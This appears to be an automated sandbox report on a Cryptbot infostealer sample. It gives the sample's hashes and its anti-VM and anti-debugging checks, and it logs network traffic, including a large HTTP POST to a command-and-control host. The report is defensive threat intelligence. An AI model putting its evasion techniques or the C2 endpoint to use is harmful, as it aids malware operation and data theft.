Analysis
-
max time kernel
92s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 03:13
Static task
static1
Behavioral task
behavioral1
Sample
f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
Resource
win7-20240903-en
General
-
Target
f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
-
Size
4.3MB
-
MD5
67844ee11cdf53db1185db90d33cf907
-
SHA1
33dc77a1ae23d6a5bc0da0429ad3f0f855c8d4d9
-
SHA256
f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09
-
SHA512
f317adaa600efbe4db4fc630a8d971328b40e44c6b94fdc5bc8aafcf1ad47626a94db815dbf62e655de4600ba4b89651ad76ff7df71ec39543ca301f94524a76
-
SSDEEP
98304:OYexTGTTGbdZZElFJWR3a+zn3kMkslFzf1n5MFJW43R8:WMTcdEs9VRnM3WYO
Malware Config
Extracted
cryptbot
Signatures
-
Cryptbot family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe 220 f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe"C:\Users\Admin\AppData\Local\Temp\f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe"1⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:220
Network
-
Remote address:8.8.8.8:53Requesthttpbin.orgIN AResponse
-
Remote address:8.8.8.8:53Requesthttpbin.orgIN AAAAResponsehttpbin.orgIN A98.85.100.80httpbin.orgIN A34.226.108.155
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request80.100.85.98.in-addr.arpaIN PTRResponse80.100.85.98.in-addr.arpaIN PTRec2-98-85-100-80 compute-1 amazonawscom
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AResponse
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AAAAResponsehome.twentytk20pn.topIN A147.45.113.159
-
POSThttp://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exeRemote address:147.45.113.159:80RequestPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 481042
ResponseHTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 03:13:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1
Connection: close
-
Remote address:8.8.8.8:53Request159.113.45.147.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request75.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AResponsehome.twentytk20pn.topIN A147.45.113.159
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AAAAResponse
-
GEThttp://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exeRemote address:147.45.113.159:80RequestGET /WEIsmPfDcpBFJozngnYN1734366322?argument=0 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
ResponseHTTP/1.1 404 NOT FOUND
Date: Sat, 21 Dec 2024 03:13:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AResponsehome.twentytk20pn.topIN A147.45.113.159
-
Remote address:8.8.8.8:53Requesthome.twentytk20pn.topIN AAAAResponse
-
POSThttp://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exeRemote address:147.45.113.159:80RequestPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 31
ResponseHTTP/1.1 404 NOT FOUND
Date: Sat, 21 Dec 2024 03:13:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
98.85.100.80:443httpbin.orgtlsf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe1.5kB 6.4kB 14 15
-
147.45.113.159:80http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322httpf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe495.7kB 13.5kB 363 334
HTTP Request
POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322HTTP Response
200 -
147.45.113.159:80http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0httpf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe331 B 544 B 5 4
HTTP Request
GET http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0HTTP Response
404 -
147.45.113.159:80http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322httpf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe404 B 544 B 5 4
HTTP Request
POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322HTTP Response
404
-
160 B 250 B 2 2
DNS Request
httpbin.org
DNS Request
httpbin.org
DNS Response
98.85.100.8034.226.108.155
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
71 B 125 B 1 1
DNS Request
80.100.85.98.in-addr.arpa
-
8.8.8.8:53home.twentytk20pn.topdnsf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe180 B 232 B 2 2
DNS Request
home.twentytk20pn.top
DNS Request
home.twentytk20pn.top
DNS Response
147.45.113.159
-
73 B 139 B 1 1
DNS Request
159.113.45.147.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
75.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
8.8.8.8:53home.twentytk20pn.topdnsf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe180 B 232 B 2 2
DNS Request
home.twentytk20pn.top
DNS Request
home.twentytk20pn.top
DNS Response
147.45.113.159
-
8.8.8.8:53home.twentytk20pn.topdnsf00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe180 B 232 B 2 2
DNS Request
home.twentytk20pn.top
DNS Request
home.twentytk20pn.top
DNS Response
147.45.113.159
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa